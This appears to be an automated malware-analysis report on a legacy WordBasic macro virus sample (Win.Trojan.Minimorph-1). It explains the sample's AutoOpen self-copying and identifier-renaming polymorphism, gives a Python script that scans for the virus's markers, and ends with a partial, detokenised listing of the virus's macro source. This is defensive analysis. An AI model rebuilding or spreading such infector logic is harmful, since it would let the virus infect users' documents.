Win.Trojan.Minimorph-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 fd9fb96c8e71cfbc…

MALICIOUS

Office (OLE)

Size: 6.0 KB
First seen: 2012-06-14
MD5: 969135a0601796fdaed40c4134ea1951
SHA-1: 0ddaa104091f2e1688714da94de37ebecc11e375
SHA-256: fd9fb96c8e71cfbc5d1361a3248dabdee6ff746c427d0ee28a6b3145174d138e
Risk score: 102

Malware Insights

Win.Trojan.Minimorph-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample carries a legacy WordBasic macro virus: ClamAV names it Win.Trojan.Minimorph-1, and the document body contains the self-identifying string "RSN MACRO VIRUS" together with the text "RSN MACRO VIRUS Goat file". A goat file is a bait document that anti-virus researchers deliberately let a virus infect, so this is probably an infected research sample rather than the original carrier; the macro it contains is still a live infector. The carved macro source confirms the automatic-execution path: it references the AutoOpen macro name, which Word 6/95 runs without prompting when the document is opened, and it pairs DUHIM$ + ":AutoOpen" with "AutoOpen", the template:macro form WordBasic uses when a macro is copied between a document's template and the global template. The listing also builds three strings A$, B$ and C$ character by character in a loop and then substitutes them for the identifiers "DUHIM", "PPWMS" and "DCLUL", the macro's own variable names, so each run rewrites the macro with fresh identifiers. That is a simple polymorphism that defeats naive string signatures, which is why the detokenised source rather than the raw bytes should be used for signature work.

Heuristics (3)

  • ClamAV: Win.Trojan.Minimorph-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Minimorph-1
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
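The two heuristics above come down to one check: scan the WordDocument stream itself, not a VBA project, for an auto-execution macro name alongside a propagation statement or a known virus string. The following is an added example of that check, written here as illustration and not the analyzer's own code. It assumes the marker lists from the heuristic description (AutoOpen, ToolsMacro/MacroFile/fileMacro/globMacro, "RSN MACRO VIRUS"); the other four Auto* names and the UTF-16LE search are my additions, the severity scale is my own, and the sample streams are constructed bytes, not content from the real file.

```python
"""Scan a Word document for legacy WordBasic macro-virus markers (added example)."""
import re
import sys

# Macro names Word runs without user interaction. AutoOpen is the marker named on the
# page; the other four are the remaining WordBasic auto macros (assumption: same weight).
AUTO_MACROS = (b"AutoOpen", b"AutoExec", b"AutoClose", b"AutoNew", b"AutoExit")
# Statements a WordBasic virus needs to copy itself between a document and Normal.dot
# (the list the page's heuristic names).
PROPAGATION = (b"ToolsMacro", b"MacroFile", b"fileMacro", b"globMacro")
# Self-identifying strings of historical macro viruses; only the one from this report.
KNOWN_STRINGS = (b"RSN MACRO VIRUS",)


def _find(data: bytes, needle: bytes) -> list:
    """Offsets of needle in data, case-insensitive, in both 8-bit (Word 6/95)
    and UTF-16LE (Word 97+) encodings."""
    patterns = (re.escape(needle), re.escape(needle.decode("ascii").encode("utf-16-le")))
    return [m.start() for p in patterns for m in re.finditer(p, data, re.IGNORECASE)]


def scan_wordbasic(data: bytes) -> dict:
    """Return the markers found in a WordDocument stream and a severity.

    high: an auto macro name co-occurs with a propagation statement or a known
          virus string (the combination a macro virus cannot avoid);
    info: only one class of marker is present (worth a look, not a verdict);
    none: nothing matched.
    """
    auto = [n.decode() for n in AUTO_MACROS if _find(data, n)]
    prop = [n.decode() for n in PROPAGATION if _find(data, n)]
    known = [n.decode() for n in KNOWN_STRINGS if _find(data, n)]
    if auto and (prop or known):
        severity = "high"
    elif auto or prop or known:
        severity = "info"
    else:
        severity = "none"
    return {"severity": severity, "auto_macros": auto,
            "propagation": prop, "known_strings": known}


def scan_file(path: str) -> dict:
    """Scan the WordDocument stream when olefile is available, else the raw file.

    The raw fallback works because OLE stores the stream in 512-byte sectors that
    are usually contiguous, but a marker that straddles a sector boundary in a
    fragmented file can be missed, so prefer the stream when you can get it.
    """
    try:
        import olefile
    except ImportError:
        olefile = None
    if olefile is not None and olefile.isOleFile(path):
        with olefile.OleFileIO(path) as ole:
            if ole.exists("WordDocument"):
                return scan_wordbasic(ole.openstream("WordDocument").read())
    with open(path, "rb") as fh:
        return scan_wordbasic(fh.read())


# Constructed sample streams (not bytes from the real sample): an 8-bit Word 6/95
# style fragment carrying the markers, and a benign fragment.
SAMPLE_STREAM = (b"\x00" * 16 + b"Sub MAIN\r"
                 + b"ToolsMacro DUHIM$ + \":AutoOpen\", \"AutoOpen\"\r"
                 + b"RSN MACRO VIRUS Goat file\r" + b"\x00" * 8)
CLEAN_STREAM = b"\x00" * 16 + b"Quarterly report, final draft\r" + b"\x00" * 8


if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, scan_file(path))
    if len(sys.argv) == 1:
        print("constructed sample:", scan_wordbasic(SAMPLE_STREAM))
        print("constructed clean:", scan_wordbasic(CLEAN_STREAM))
```

Run it with a file path to scan a real document, or with no arguments to see the constructed samples. Because the strings in a Word 6/95 stream are 8-bit and the tokenised macro keeps its string literals and identifiers in clear, this catches the markers the report found even though `olevba`-style VBA extraction returns nothing for such a file.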

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 444 bytes
SHA-256: 420c0136c6b4894bd0c01e9f8cd9d8833b5ef03354f7c1b09e802554814af458
Preview of the extracted script (the page shows at most the first 1,000 lines). Opcodes the detokeniser could not map to a WordBasic keyword are printed as @cmdNNNN, and operators are not recovered, so read the listing for its structure, identifiers and string literals rather than as exact statements.
MAIN
, -
@cmd8111 0
DUHIM$ = @cmd8025
@cmd80c2 DUHIM$ = ":AutoOpen" , "AutoOpen"
@cmd80c2 "AutoOpen" , DUHIM$ = ":AutoOpen"
@cmd0054 = 1
DCLUL = @cmd8002 @cmd800e 3 = 5
PPWMS = 1 DCLUL
A$ = A$ = @cmd8005 @cmd8002 @cmd800e 26 = 65
B$ = B$ = @cmd8005 @cmd8002 @cmd800e 26 = 65
C$ = C$ = @cmd8005 @cmd8002 @cmd800e 26 = 65
PPWMS
@cmd00d7 = "AutoOpen" ,
@cmd0075 = "DUHIM" , = A$ ,
@cmd0075 = "PPWMS" , = B$ ,
@cmd0075 = "DCLUL" , = C$ ,
@cmd809f 1